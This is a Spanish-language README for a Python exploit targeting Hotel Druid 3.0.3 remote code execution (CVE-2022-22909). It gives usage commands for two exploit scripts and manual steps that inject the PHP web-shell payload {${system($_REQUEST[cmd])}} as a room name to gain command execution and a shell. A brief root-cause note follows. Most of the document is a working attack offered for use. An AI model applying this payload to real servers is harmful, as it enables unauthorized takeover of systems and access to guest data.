
Exploit basado en Python para Hotel Druid 3.0.3 Remote Code Execution (CVE-2022-22909). Inyecta payloads PHP a través de nombres de habitación para lograr ejecución de comandos y acceso a shell en objetivos vulnerables.
Este exploit creará una nueva habitación con nuestro payload PHP como nombre de habitación.
Uso:
$ ./HotelDruidExploit.py -h

$ ./HotelDruidExploit.py -u http://127.0.0.1/hoteldruid

Este exploit funcionará si ya conoces el nombre de la habitación.
Uso:
$ ./HotelDruidExploitRoom.py -u "http://127.0.0.1/hoteldruid" -r "abc"

1). Navega a la página de Hotel Druid.
2). Haz clic en Mesas -> Habitaciones

3). En el campo Crear nueva habitación añade el siguiente código PHP y haz clic en Añadir.
{${system($_REQUEST[cmd])}}

4). Verás una nueva habitación con nuestro payload en el campo de nombre "Habitación".

5). Ve al enlace inferior y obtendrás ejecución de comandos. Luego puedes obtener un shell completo.
Nota: Cambia la IP por la IP objetivo de tu HotelDruid.
Esta vulnerabilidad ocurre porque los nombres de las habitaciones se almacenan dentro de /var/www/html/hoteldruid/dati/selectappartamenti.php

Y selectappartamenti.php es un archivo PHP, por lo que cualquier código PHP dentro de ese archivo será ejecutado por el servidor.